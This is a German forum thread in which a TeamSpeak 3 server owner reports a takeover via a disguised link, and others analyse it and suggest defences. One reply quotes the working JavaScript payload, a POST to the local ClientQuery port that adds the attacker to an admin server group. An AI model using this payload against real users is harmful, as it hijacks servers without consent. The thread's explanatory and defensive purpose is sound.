|
You last visited: Today at 11:55
Advertisement
Teamspeak gehackt via Link
Discussion on Teamspeak gehackt via Link within the Technical Support forum part of the Off-Topics category.
03/18/2017, 15:01
|
#1
|
elite*gold: 0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
|
Teamspeak gehackt via Link
Mein Teamspeak 3 Server wurde gestern opfer eines Hack
der folgen gelaufen ist
Er hat eine URL gepostet die versteckt in einer anderen URL war
hab auf dem Link geklickt und dann hatte der Typ auf einmal alle Rechte die ich hatte den Server klein gemacht und alles gelöscht
Ich frage mich A. wie geht das und B. welche Gegenmaßnahmen sollte ich unternehmen
Hab mir bereichst ne neue Identität erstellt und die Rechte von dem alten Entfernt
Was dazu kommt ist das der User der das gemacht hatte noch irgendwelche Icons hatte die ich garnicht auf dem Server habe wie kommt das?
|
|
|
03/18/2017, 16:47
|
#2
|
elite*gold: 1640
Join Date: Jun 2012
Posts: 18,889
Received Thanks: 9,335
|
Kannst du mir die URL mal schicken (bitte nicht hier posten)?
Eventuell ist er in TS noch unter Extras -> Gesammeltes URLs gespeichert.
|
|
|
03/18/2017, 17:53
|
#3
|
elite*gold: 30
Join Date: Jun 2015
Posts: 460
Received Thanks: 90
|
Mir pls. Auch mal in einer DM würde mir das gerne mal anschauen 🤣
|
|
|
03/18/2017, 21:26
|
#4
|
elite*gold: 32
Join Date: Dec 2015
Posts: 2,275
Received Thanks: 1,113
|
Danke für den link erstmal.
Der fuchs chickt via XMLREquest (ajax oder?) requests an deinen Server
function cMultiToolCreator() {
var cMultiTool = new XMLHttpRequest();
cMultiTool.open('POST', 'http://127.0.0.1:25639', true);
cMultiTool.onreadystatechange = function() {
return true
};
cMultiTool.send("servergroupaddclient sgid=46 cldbid=3712" + "\n")
}
servergroupaddclient sgid=46 cldbid=3712
Das addet wohl ihn zur gruppe 46 (admins?)
//Um einen erneuten angriff vorzubeugen:
1. Öffne niemals dort links/dateien wo dein Server hostet.
2. Änder default werte (wie z.b der Port 25639 usw) dann schafft so ein script es nicht sich zu verbinden.
|
|
|
03/18/2017, 22:23
|
#5
|
elite*gold: 0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
|
Ah danke für die Hilfe
aber ne GID 46 gibt es bei uns im TS garnicht
|
|
|
03/19/2017, 12:52
|
#6
|
elite*gold: 1640
Join Date: Jun 2012
Posts: 18,889
Received Thanks: 9,335
|
Sicher? Die Zahl scheint mir nicht zufällig gewählt worden zu sein. In einem anderen Script verwenden sie die 6404 als ID. Standard ist das zumindest nicht.
Code:
var CyberkiddySG = "6404";
var CyberkiddyCDB = "3174";
|
|
|
03/19/2017, 18:40
|
#7
|
elite*gold: 0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
|
mmh komisch
aber da reichen meine Kenntnisse nicht aus um da genauer drauf eingehen zu können
Kann auch sein das es der denjenige der Gebannt wurden ist bzw mal Admin bei uns wahr zusammenhängt
also wenn du dafür mehr infomationen brauchst kann ich dir anbieten das wir uns mal im TS treffen oder so wäre glaub besser dafür
|
|
|
03/20/2017, 15:54
|
#8
|
elite*gold: 57
Join Date: Jun 2011
Posts: 2,220
Received Thanks: 865
|
Ist der Server selbst gehostet oder hast du nur den ServerAdmin? Wenn du noch den ServerQuery Admin hast, dann kannst du ja für die normalen Server Admins die Berechtigung entfernen einem anderen User eine Gruppe zuzuweisen bzw. die Berechtigung entfernen, benutzerspezifische Berechtigungen zu vegeben.. dann bist du definitiv safe. Außerdem wäre es sinnvoll den Quer-Port nur zugänglich zu machen, wenn man von intern connectet, dann müsstest du das über einen SSH-Tunnel machen.
|
|
|
03/20/2017, 20:44
|
#9
|
elite*gold: 424
Join Date: Dec 2012
Posts: 4,208
Received Thanks: 903
|
Sowas geht nur, wenn der server nachlässig eingestellt ist.
Benutzer, die rechte verlieren, sollten auch kontroliert werden, ob am client rechte vergeben sind. Wird gerne vergessen. Oder rechte an channels koppeln. Wer dann dort drin ist, hat bestimmte rechte.
|
|
|
03/20/2017, 22:19
|
#10
|
elite*gold: 0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
|
Das Skript hat so gearbeitet das es sich als mich ausgegeben hat und den Angreifer zum Server Admin gemacht hat da der Angreifer anscheiden die ID wusste kann es nur ein Ex Admin gewesen sein
da spielt es keine Rolle ob ich nun File Rechte für den Server hab oder nicht er hat einfach meine normalen Adminrechte dazu verwenden sich in die Gruppe zu adden
PS: ich muss dazu sagen das ich es so erklärt bekommen habe
|
|
|
03/20/2017, 22:47
|
#11
|
elite*gold: 57
Join Date: Jun 2011
Posts: 2,220
Received Thanks: 865
|
Quote:
Originally Posted by Draygh
Das Skript hat so gearbeitet das es sich als mich ausgegeben hat und den Angreifer zum Server Admin gemacht hat da der Angreifer anscheiden die ID wusste kann es nur ein Ex Admin gewesen sein
da spielt es keine Rolle ob ich nun File Rechte für den Server hab oder nicht er hat einfach meine normalen Adminrechte dazu verwenden sich in die Gruppe zu adden
PS: ich muss dazu sagen das ich es so erklärt bekommen habe
|
Aber wie bereits erwähnt, wenn du die Rechte so anpasst, dass du keinem anderen User eine Gruppe oder spezifische Benutzerrechte zuweisen kannst, dann wird das nicht passieren.
|
|
|
03/20/2017, 22:49
|
#12
|
elite*gold: 0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
|
Stimmt schon aber es ist einfach bequemer und man denk an sowas garnicht xd
aber immerhin ein hoh auf das Backup xd
Das Problem ist aber auch das es da passiert ist wo man kein QueryAdmin oder sowas hat
|
|
|
Similar Threads
|
[Teamspeak] Link verstecken
04/01/2013 - Tutorials - 7 Replies
Hi Leute.
Hier ein kleiner Trick wie man Links bei TS verstecken kann, den ich per Zufall (Wie auch viele Sachen im Leben) herausgefunden habe.
Undzwar geht es so.
Schreibt eurem Freund den Code:
http://pastebin.com/aHQ6LY5J
Nun würde bei eurem Freund der Link erscheinen:
|
TeamSpeak gehackt! Kann mir wer Helfen?
11/17/2012 - Off Topic - 10 Replies
Hallo Forum!
Schlechte Nachricht für mein Teamspeak!
Also Heute um ca 13 Uhr kamen 2 Neue Leute aufs TS..
Diese hatten nach ca 2 Minuten Admin Rechte und Entzogen unsere.
Ich kann nichts mehr ändern! Kein Webinterface oder sonstiges!
Support wird nicht Helfen. (Erfahrung)
Kann uns wer von euch Helfen?
Der Server ist wirklich Gehackt (sieht man schon beim Connecten)
Wen ihr eine Lösung findet..Egal ob Legal oder Illegal..Helft uns Bitte!
Mit Glück springt was herraus!
|
All times are GMT +2. The time now is 11:55.
|
|